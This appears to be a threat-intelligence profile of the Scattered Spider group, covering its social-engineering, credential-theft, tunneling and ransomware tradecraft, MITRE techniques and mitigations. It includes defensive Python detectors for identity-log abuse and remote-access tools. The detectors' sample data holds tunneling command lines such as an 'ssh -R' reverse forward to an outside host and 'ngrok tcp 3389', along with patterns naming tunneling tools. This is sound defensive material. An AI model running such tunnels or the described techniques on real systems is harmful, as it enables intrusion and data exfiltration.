Scattered Spider – Threat Actor

August 6, 2024
in Threat Actors

Scattered Spider

Other Names

UNC3944, Roasted 0ktapus, 0ktapus, DEV-0971, Muddled Libra, Octo Tempest, Oktapus, Scatter Swine, Scattered Swine, Storm-0971

Date of initial activity

At least May 2022

Associated Groups

Roasted 0ktapus, Octo Tempest, Storm-0875

Associated tools

BlackCat, Impacket, LaZagne, Mimikatz, Raccoon Stealer, AnyDesk, LogMeIn, ConnectWise Control, WarzoneRAT, aws_consoler, RustScan, Ngrok, LinPEAS, rsocx, SSH Tunneling, Phishing Kits

Motivation

Financial Gain through ransomware deployment and data theft

Overview

Scattered Spider is a native English-speaking cybercriminal group that has been active since at least May 2022. Initially, the group targeted customer relationship management (CRM) and business process outsourcing (BPO) firms, as well as telecommunications and technology companies. In 2023, Scattered Spider expanded its operations to include victims in the gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors.

Common targets

Telecommunications, Technology, Gaming, Hospitality, Retail, Manufacturing, Financial Services, Managed Service Providers (MSPs).

Attack Vectors

Exploitation of vulnerabilities, spearphishing, phishing, ransomware, compromised credentials

How they operate

Scattered Spider is a financially motivated cybercriminal group active since at least May 2022. Its early targets were customer relationship management (CRM) and business process outsourcing (BPO) firms together with telecommunications and technology companies; by 2023 the group had expanded to gaming, hospitality, retail, managed service providers (MSPs), manufacturing, and financial institutions.

The group pairs solid technical tradecraft with aggressive social engineering. Initial access comes from exploiting vulnerabilities in public-facing applications and from highly targeted phishing, including voice phishing of help desks and employees in which operators impersonate IT staff to obtain credentials, have MFA reset, or persuade the victim to install remote access software. Where MFA is in place the group defeats it with push fatigue (repeated MFA prompts until one is approved) and by registering attacker-controlled devices and authentication methods on the compromised account.

Once inside, the group escalates privileges and moves laterally. Credential theft relies on Mimikatz and LaZagne, on dumping NTDS, and on DCSync-style directory replication through Impacket (the "domain replication" captured in the technique list as T1003.006); Raccoon Stealer harvests browser histories and session cookies, which the group uses to hijack authenticated web sessions. In cloud tenants they enumerate users, groups and roles, add their own credentials and roles, weaken conditional access policies, and create email hiding rules so that security notifications never reach the victim.

Data theft is a core objective. The group collects sensitive data from cloud storage, SharePoint and code repositories as well as on-premises servers, stages it, and exfiltrates it through tunnels (ngrok, rsocx, SSH port forwarding) to remote web servers or cloud storage platforms. When faster monetization is wanted, it deploys BlackCat ransomware, encrypting critical files and demanding payment for decryption.

Social engineering also supports persistence: by impersonating IT personnel the group gets employees to install remote monitoring and management (RMM) tools such as AnyDesk, LogMeIn and ConnectWise Control, giving it a legitimate-looking foothold that survives password changes. Other tooling includes WarzoneRAT for remote access, RustScan for port scanning, LinPEAS for privilege-escalation enumeration on Linux hosts, and aws_consoler for turning stolen AWS API keys into console sessions.
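The identity-layer behaviours described above (MFA push fatigue, a new authenticator followed by a device registration, conditional access edits, and inbox rules that divert security mail) are the ones a defender can catch in tenant audit logs. The following is an added example, not code from the original page or from any vendor; the event schema is a constructed, simplified stand-in for Entra ID or Okta audit records, and the thresholds, the approved-admin set and the keyword list are assumptions chosen for illustration.

```python
"""Detections for identity-layer tradecraft: MFA push fatigue (T1621), new MFA
method then device registration (T1556.006 / T1098.005), conditional access
tampering (T1556.009) and email hiding rules (T1564.008). Added example; the
event schema is a constructed stand-in for Entra ID / Okta audit records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample audit events (assumed schema, not real product output).
SAMPLE_EVENTS = [
    {"ts": "2024-08-01T08:00:00", "user": "ca-admin", "action": "conditional_access_policy_updated",
     "result": "success", "ip": "198.51.100.5", "detail": "Require MFA for all users"},
    # six denied pushes in five minutes, then the victim finally approves one
    *[{"ts": f"2024-08-01T09:0{i}:00", "user": "jdoe", "action": "mfa_push",
       "result": "denied", "ip": "203.0.113.10", "detail": ""} for i in range(6)],
    {"ts": "2024-08-01T09:08:00", "user": "jdoe", "action": "mfa_push",
     "result": "approved", "ip": "203.0.113.10", "detail": ""},
    {"ts": "2024-08-01T09:10:00", "user": "jdoe", "action": "mfa_method_added",
     "result": "success", "ip": "203.0.113.10", "detail": "Authenticator app"},
    {"ts": "2024-08-01T09:12:00", "user": "jdoe", "action": "device_registered",
     "result": "success", "ip": "203.0.113.10", "detail": "DESKTOP-7Q2K"},
    {"ts": "2024-08-01T09:30:00", "user": "jdoe", "action": "conditional_access_policy_updated",
     "result": "success", "ip": "203.0.113.10", "detail": "Exclude jdoe from MFA policy"},
    {"ts": "2024-08-01T09:35:00", "user": "jdoe", "action": "inbox_rule_created",
     "result": "success", "ip": "203.0.113.10", "detail": "move:'security alert' -> RSS Subscriptions"},
    {"ts": "2024-08-01T10:00:00", "user": "asmith", "action": "mfa_push",
     "result": "approved", "ip": "198.51.100.22", "detail": ""},
    {"ts": "2024-08-01T10:05:00", "user": "asmith", "action": "inbox_rule_created",
     "result": "success", "ip": "198.51.100.22", "detail": "move:'newsletter' -> Archive"},
]

POLICY_ACTIONS = {"conditional_access_policy_updated", "conditional_access_policy_deleted"}
# Assumed keyword list: subjects an attacker wants hidden from the mailbox owner.
HIDE_TERMS = ("security", "mfa", "password", "phish", "suspicious", "sign-in")


def load(raw_events):
    """Parse timestamps and return events in chronological order."""
    rows = [dict(e, ts=datetime.fromisoformat(e["ts"])) for e in raw_events]
    return sorted(rows, key=lambda e: e["ts"])


def detect_mfa_fatigue(events, threshold=5, window=timedelta(minutes=10)):
    """T1621: `threshold` or more denied pushes for one user inside `window`,
    followed by an approval. Returns (user, approval time, denial count)."""
    alerts, denied = [], defaultdict(list)
    for e in events:
        if e["action"] != "mfa_push":
            continue
        q = denied[e["user"]]
        if e["result"] == "denied":
            q.append(e["ts"])
        elif e["result"] == "approved":
            recent = [t for t in q if e["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append((e["user"], e["ts"].isoformat(), len(recent)))
            q.clear()  # an approval ends the burst either way
    return alerts


def detect_new_factor_then_device(events, window=timedelta(minutes=30)):
    """T1556.006 + T1098.005: a new MFA method, then a device joined soon after."""
    alerts, last_factor = [], {}
    for e in events:
        if e["action"] == "mfa_method_added":
            last_factor[e["user"]] = e["ts"]
        elif e["action"] == "device_registered":
            t = last_factor.get(e["user"])
            if t is not None and e["ts"] - t <= window:
                alerts.append((e["user"], e["ts"].isoformat()))
    return alerts


def detect_policy_tampering(events, approved_admins):
    """T1556.009: conditional access edits by anyone outside the approved admin set."""
    return [(e["user"], e["action"], e["ts"].isoformat())
            for e in events
            if e["action"] in POLICY_ACTIONS and e["user"] not in approved_admins]


def detect_hiding_rules(events):
    """T1564.008: inbox rules whose filter mentions security-related terms."""
    return [(e["user"], e["detail"]) for e in events
            if e["action"] == "inbox_rule_created"
            and any(term in e["detail"].lower() for term in HIDE_TERMS)]


def run_all(raw_events, approved_admins=frozenset({"ca-admin"})):
    events = load(raw_events)
    return {
        "mfa_fatigue": detect_mfa_fatigue(events),
        "factor_then_device": detect_new_factor_then_device(events),
        "policy_tampering": detect_policy_tampering(events, approved_admins),
        "hiding_rules": detect_hiding_rules(events),
    }


if __name__ == "__main__":
    for name, hits in run_all(SAMPLE_EVENTS).items():
        print(f"{name}: {hits}")
```

On the constructed sample only jdoe trips the four detections; asmith's single approved push and newsletter rule stay quiet. In production the same logic sits over the tenant's sign-in and audit log exports, and the approved-admin set should come from the role assignments you actually intend rather than from a hard-coded list.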

MITRE tactics and techniques

Enterprise
  • T1087.002 Account Discovery: Domain Account
  • T1087.003 Account Discovery: Email Account
  • T1087.004 Account Discovery: Cloud Account
  • T1098.001 Account Manipulation: Additional Cloud Credentials
  • T1098.003 Account Manipulation: Additional Cloud Roles
  • T1098.005 Account Manipulation: Device Registration
  • T1217 Browser Information Discovery
  • T1580 Cloud Infrastructure Discovery
  • T1538 Cloud Service Dashboard
  • T1136 Create Account
  • T1486 Data Encrypted for Impact
  • T1530 Data from Cloud Storage
  • T1213.002 Data from Information Repositories: Sharepoint
  • T1213.003 Data from Information Repositories: Code Repositories
  • T1074 Data Staged
  • T1006 Direct Volume Access
  • T1484.002 Domain or Tenant Policy Modification: Trust Modification
  • T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
  • T1190 Exploit Public-Facing Application
  • T1068 Exploitation for Privilege Escalation
  • T1133 External Remote Services
  • T1083 File and Directory Discovery
  • T1657 Financial Theft
  • T1589.001 Gather Victim Identity Information: Credentials
  • T1564.008 Hide Artifacts: Email Hiding Rules
  • T1656 Impersonation
  • T1105 Ingress Tool Transfer
  • T1556.006 Modify Authentication Process: Multi-Factor Authentication
  • T1556.009 Modify Authentication Process: Conditional Access Policies
  • T1621 Multi-Factor Authentication Request Generation
  • T1046 Network Service Discovery
  • T1588.002 Obtain Capabilities: Tool
  • T1003.003 OS Credential Dumping: NTDS
  • T1003.006 OS Credential Dumping: DCSync
  • T1069.003 Permission Groups Discovery: Cloud Groups
  • T1566.004 Phishing: Spearphishing Voice
  • T1598 Phishing for Information
  • T1598.001 Phishing for Information: Spearphishing Service
  • T1598.004 Phishing for Information: Spearphishing Voice
  • T1572 Protocol Tunneling
  • T1090 Proxy
  • T1219 Remote Access Software
  • T1021.007 Remote Services: Cloud Services
  • T1018 Remote System Discovery
  • T1539 Steal Web Session Cookie
  • T1553.002 Subvert Trust Controls: Code Signing
  • T1552.001 Unsecured Credentials: Credentials In Files
  • T1552.004 Unsecured Credentials: Private Keys
  • T1204 User Execution
  • T1078.004 Valid Accounts: Cloud Accounts
  • T1102 Web Service
  • T1047 Windows Management Instrumentation
Mobile
  • T1660 Phishing

Mitigations

Here are some mitigations to consider against threats posed by groups like Scattered Spider:
  • Phishing-resistant MFA: Enforce MFA on every account and prefer FIDO2/WebAuthn or certificate-based methods for privileged, help-desk and remote-access users. Push-notification MFA is exactly what the group wears down with prompt bombing (T1621) and help-desk resets, so require number matching on pushes and alert on bursts of denied prompts.
  • Harden help-desk identity verification: Require out-of-band, pre-registered verification before any password or MFA reset, and treat requests to enroll a new device or authenticator as high risk; the group's voice phishing (T1566.004) targets this workflow directly.
  • Regular Security Awareness Training: Educate employees about phishing, vishing and IT-impersonation tactics to reduce the likelihood of successful social engineering.
  • Patch and Update Systems: Apply security patches promptly, prioritising internet-facing applications and identity infrastructure, which the group exploits for initial access (T1190).
  • Network Segmentation: Limit lateral movement by isolating critical systems, domain controllers and backup infrastructure from user segments.
  • Use Endpoint Detection and Response (EDR) Tools and allowlist remote access software: Deploy EDR to detect credential dumping and lateral movement, and block or alert on remote monitoring and management tools (AnyDesk, LogMeIn, ConnectWise Control) and tunneling utilities (ngrok, rsocx, SSH port forwarding) that are not sanctioned on a given host (T1219, T1572).
  • Monitor identity and cloud audit logs: Alert on new MFA methods and device registrations, conditional access policy changes, inbox rules that divert security mail, and additional cloud credentials or roles (T1098, T1556.009, T1564.008).
  • Monitor and Analyze Network Traffic: Detect anomalous traffic such as large transfers to cloud storage or unexpected outbound tunnels indicative of exfiltration (T1567.002).
  • Data Encryption: Encrypt sensitive data both at rest and in transit. This does not stop exfiltration by an attacker holding valid accounts, so pair it with access controls on the data stores themselves.
  • Backup and Disaster Recovery Plan: Maintain offline or immutable backups of critical data, test restoration, and keep a disaster recovery plan to minimise the impact of BlackCat ransomware.
  • Access Control and Least Privilege: Enforce the principle of least privilege, and in particular restrict who can change conditional access policies, register devices and add cloud roles.
  • Incident Response Plan: Develop and regularly test an incident response plan. For this group it should include identity-tenant recovery steps: revoking sessions and tokens, removing attacker-registered devices and MFA methods, and reviewing conditional access and inbox rules.
  • Threat Intelligence and Information Sharing: Stay informed about emerging threats and tactics used by threat actors through threat intelligence sources and industry information sharing platforms.
  • Secure Configuration: Ensure that systems and applications are securely configured according to industry best practices and vendor guidelines.
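The EDR and least-privilege points above come down to one concrete control on the endpoint: knowing which remote access and tunneling tools are sanctioned on which hosts, and flagging everything else. The following is an added example, not code from the original page or from any EDR vendor. It runs over constructed process-creation events in an assumed pipe-delimited format (host|user|image|command_line); the tool patterns, the allowlist and the "user-writable path" heuristic are assumptions for illustration.

```python
"""Audit of remote-access and tunneling tools on endpoints (T1219, T1572).
Added example over constructed process-creation events; the allowlist and
tool signatures are illustrative assumptions, not an official list."""
import re

# Constructed sample events in an assumed format: host|user|image|command_line
SAMPLE_PROCESS_EVENTS = """\
WS-114|corp\\jdoe|C:\\Users\\jdoe\\Downloads\\AnyDesk.exe|AnyDesk.exe --silent
SRV-DB01|corp\\svc_backup|C:\\Tools\\ngrok.exe|ngrok tcp 3389
HELPDESK-02|corp\\helpdesk1|C:\\Program Files\\ScreenConnect Client\\ScreenConnect.ClientService.exe|ScreenConnect.ClientService.exe
HELPDESK-02|corp\\helpdesk1|C:\\Users\\helpdesk1\\Downloads\\ScreenConnect.ClientSetup.exe|ScreenConnect.ClientSetup.exe /silent
SRV-WEB02|root|/usr/bin/ssh|ssh -R 0.0.0.0:2222:127.0.0.1:22 -N ops@203.0.113.77
WS-211|corp\\asmith|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt
"""

# Signatures for the tools the profile associates with the group (image or command line).
REMOTE_TOOL_PATTERNS = {
    "AnyDesk": re.compile(r"anydesk", re.I),
    "LogMeIn": re.compile(r"logmein", re.I),
    "ConnectWise Control": re.compile(r"screenconnect|connectwise", re.I),
    "ngrok": re.compile(r"\bngrok\b", re.I),
    "rsocx": re.compile(r"\brsocx\b", re.I),
}
# ssh with a remote (-R), dynamic (-D) or local (-L) forward is a tunnel, not an interactive shell.
SSH_TUNNEL = re.compile(r"\bssh\b.*\s-[RDL]\s*\S+")
# Locations any user can write to; a sanctioned RMM agent is expected under Program Files.
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData)\\|/tmp/|/home/", re.I)

# Assumed allowlist: tool -> hosts where it is approved.
ALLOWED = {"ConnectWise Control": {"HELPDESK-02"}}


def parse_events(text):
    rows = []
    for line in text.strip().splitlines():
        host, user, image, cmd = line.split("|", 3)
        rows.append({"host": host, "user": user, "image": image, "cmd": cmd})
    return rows


def audit_remote_tools(events, allowed):
    """Return (host, user, finding) tuples for unsanctioned remote-access tools,
    sanctioned tools running from user-writable paths, and ssh tunnels."""
    findings = []
    for e in events:
        hay = f"{e['image']} {e['cmd']}"
        for tool, pat in REMOTE_TOOL_PATTERNS.items():
            if not pat.search(hay):
                continue
            if e["host"] not in allowed.get(tool, set()):
                findings.append((e["host"], e["user"], f"unsanctioned {tool}"))
            elif USER_WRITABLE.search(e["image"]):
                # right tool, right host, wrong place: a dropped copy rather than the managed agent
                findings.append((e["host"], e["user"], f"sanctioned {tool} from user-writable path"))
        if SSH_TUNNEL.search(e["cmd"]):
            findings.append((e["host"], e["user"], "ssh port forward / tunnel"))
    return findings


if __name__ == "__main__":
    for host, user, finding in audit_remote_tools(parse_events(SAMPLE_PROCESS_EVENTS), ALLOWED):
        print(f"{host:12} {user:18} {finding}")
```

The managed ScreenConnect service on HELPDESK-02 produces no finding, while the same tool launched from a Downloads folder on the same host does: an allowlist keyed only on tool name would miss the second case, which is how an operator-installed copy typically arrives after a vishing call.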

Significant Malware Campaigns

C0027 (June 2022 – December 2022): In this campaign Scattered Spider accessed Azure Active Directory (now Microsoft Entra ID) to identify email addresses and download bulk lists of group members, and exploited CVE-2021-35464, a remote code execution vulnerability in the ForgeRock Open Access Management (OpenAM) application server. The group used RustScan for port scanning and deployed remote monitoring and management (RMM) tools to maintain persistence.